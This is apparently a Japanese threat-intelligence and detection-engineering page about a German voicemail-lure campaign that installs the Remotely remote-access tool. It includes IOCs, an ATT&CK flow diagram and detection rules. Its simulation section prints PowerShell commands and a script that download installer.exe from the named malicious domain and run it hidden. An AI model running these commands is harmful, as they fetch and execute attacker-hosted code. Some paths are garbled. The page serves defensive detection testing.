フォローする
概要
脅威アクターは、ユーザーにBATファイルをダウンロードさせるドイツ語の「ボイスメール」ランディングページをホストしています。このスクリプトは無害な音声デコイを再生しながら、正規のRemotelyリモート監視ツールを静かにインストールします。一度展開されると、RMMエージェントは攻撃者に攻撃者が制御するC2インフラストラクチャを通じて永続的なリモートアクセスを提供します。
調査
Censysは、*.cadillac.psドメイン上で悪意のあるBATを配布している86の侵害されたウェブサイトを特定しました。このスクリプトはremotely.billbutterworth.comにホストされたPowerShellインストーラーを呼び出し、Remotely ZIPパッケージを取得します。アーカイブにはRemotelyエージェントコンポーネントと、C:Program FilesRemotelyにインストールされるサービスが含まれています。
緩和策
DNS/プロキシレイヤーで*.cadillac.psドメインとremotely.billbutterworth.comをブロックします。ユーザーには予期しないBATファイルを実行しないことや、未知のウェブページからPowerShellコマンドをコピー/ペーストしないように教育します。Remotelyサービスの作成や、疑わしいインストールパス、サインされていないツールを検出するためにエンドポイントコントロールを展開します。
反応
Program Files下でのRemotely_Serviceの作成とRemotely_Agent.exeの存在をアラートします。voicemail.batおよび関連するPowerShellインストーラーの活動をハントしてください。影響を受けたホストを隔離し、フォレンジックアーティファクトを収集し、RMMエージェントによって利用されたすべての資格情報またはトークンを回転/取り消します。
graph TB %% クラス定義 classDef action fill:#99ccff %% ノード node_content_injection[“<b>技術</b> – T1659 コンテンツインジェクション<br/>侵害されたWebプロパティが悪意のあるリンクを配信。”] class node_content_injection action node_initial_user_exec[“<b>技術</b> – T1204.001 ユーザー実行: 悪意のあるリンク<br/>被害者が侵害されたボイスメールランディングページへの悪意のあるリンクをクリック。”] class node_initial_user_exec action node_cmd_shell[“<b>技術</b> – T1059.003 Windowsコマンドシェル<br/>BATファイル(voicemail.bat)がダウンロードされ実行される。”] class node_cmd_shell action node_powershell[“<b>技術</b> – T1059.001 PowerShell<br/>Install-Remotely.ps1 スクリプトが Remotely RMM をインストール。”] class node_powershell action node_system_service[“<b>技術</b> – T1569 システムサービス<br/>RMM が Windows サービス(Remotely_Service)としてインストール。”] class node_system_service action node_masquerading[“<b>技術</b> – T1036 なりすまし & T1036.008 ファイルタイプの偽装<br/>BAT がメディア更新として表示され、Program Files に配置。”] class node_masquerading action node_hide_artifacts[“<b>技術</b> – T1564 アーティファクトの隠蔽<br/>インストールアーティファクトが C:\Program Files\Remotely に隠蔽。”] class node_hide_artifacts action node_c2[“<b>技術</b> – T1102.002 Webサービス双方向通信 & T1071 アプリケーションレイヤープロトコル<br/>リモートサーバーとの HTTPS 通信。”] class node_c2 action %% 接続 node_content_injection –>|支援| node_initial_user_exec node_initial_user_exec –>|につながる| node_cmd_shell node_cmd_shell –>|実行| node_powershell node_powershell –>|インストール| node_system_service node_system_service –>|使用| node_masquerading node_system_service –>|使用| node_hide_artifacts node_system_service –>|確立| node_c2
攻撃フロー
検出
PowerShell経由でのダウンロードまたはアップロード(cmdline経由)
表示
疑わしいランサムウェアによるサービス停止操作(cmdline経由)
表示
疑わしいディレクトリでのファイル実行をBP (バイパス実行ポリシー) を使用して実行するPowerShell(cmdline経由)
表示
Voicemail Trapの検出用IOCs(ハッシュSHA256): ドイツ語のボイスメールルアーがリモートアクセスに至る
表示
Voicemail Trapの検出用IOCs(ハッシュMD5): ドイツ語のボイスメールルアーがリモートアクセスに至る
表示
RMMのインストールに至るドイツ語のボイスメールルアー[Webサーバー]
表示
Voicemail BATファイル実行検出[Windowsファイルイベント]
表示
シミュレーション実行
前提条件: テレメトリー&ベースライン事前チェックが合格している必要があります。
理由: このセクションは、検出ルールをトリガーするように設計された敵の技術(TTP)の正確な実行を詳述します。コマンドと説明は、識別されたTTPを直接反映しており、検出ロジックによって予想される正確なテレメトリーを生成することを目的としています。抽象的または無関係な例は誤診につながります。
-
攻撃の流れとコマンド:
- フィッシング配信: 攻撃者は、HTML添付ファイルのドイツ語ボイスメールルアーを含むメールを送信し、そのHTMLが開かれると、被害者は
http://bannerbank.cadillac.ps/voicemail.html. - ランディングページ実行: ランディングページには、リモート管理ツール(RMM)インストーラーをダウンロードして実行する悪意のあるPowerShellのワンライナーがホストされています。
- プロセス作成: 被害者のブラウザがページを処理する際に、 明示的に ルールが監視する2つの文字列を含んでいるコマンドラインでPowerShellが呼び出されます。
- 結果のテレメトリー: Windowsは、次の内容を含むイベントID 4688をログに記録します
CommandLine「voicemail-themed landing page」 「bannerbank.cadillac.ps」 and 、これによりSigma条件を満たします。シミュレーションで使用された正確なコマンド:
The exact command used for the simulation:
# シミュレーションされた悪意のある実行 – どちらのトリガー文字列も含む Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"Write-Host 'voicemail-themed landing page'; Invoke-WebRequest -Uri 'http://bannerbank.cadillac.ps/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe`"" - フィッシング配信: 攻撃者は、HTML添付ファイルのドイツ語ボイスメールルアーを含むメールを送信し、そのHTMLが開かれると、被害者は
-
回帰テストスクリプト: どのWindowsホストでも必要なロギングが有効であれば実行できる攻撃を再現する自己完結型のPowerShellスクリプトです。
<# .SYNOPSIS Sigma検出ルールをトリガーするドイツ語のボイスメールルアーをシミュレートします。 .DESCRIPTION 両方の必要なサブストリングを含むPowerShellコマンドラインを実行します。 #> # 悪意のある文字列を定義 $lureText = "voicemail-themed landing page" $maliciousDomain = "bannerbank.cadillac.ps" # コマンドラインに表示されるワンライナーを構築 $payload = @" Write-Host '$lureText'; Invoke-WebRequest -Uri 'http://$maliciousDomain/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe "@ # 作成されたコマンドラインでPowerShellを起動 $psArgs = "-NoProfile -WindowStyle Hidden -Command `"$payload`"" Write-Host "悪意のあるPowerShellコマンドを起動しています..." Start-Process -FilePath "powershell.exe" -ArgumentList $psArgs -PassThru # オプション: ロギングを確実にするために数秒待機 Start-Sleep -Seconds 5 -
クリーンアップコマンド: ダウンロードされたインストーラーとすべての残留プロセスを削除します。
# 残っているインストーラープロセスを停止 Get-Process -Name "installer" -ErrorAction SilentlyContinue | Stop-Process -Force # 一時インストーラーファイルを削除 $installerPath = "$env:TEMPinstaller.exe" if (Test-Path $installerPath) { Remove-Item $installerPath -Force Write-Host "Cleaned up $installerPath" }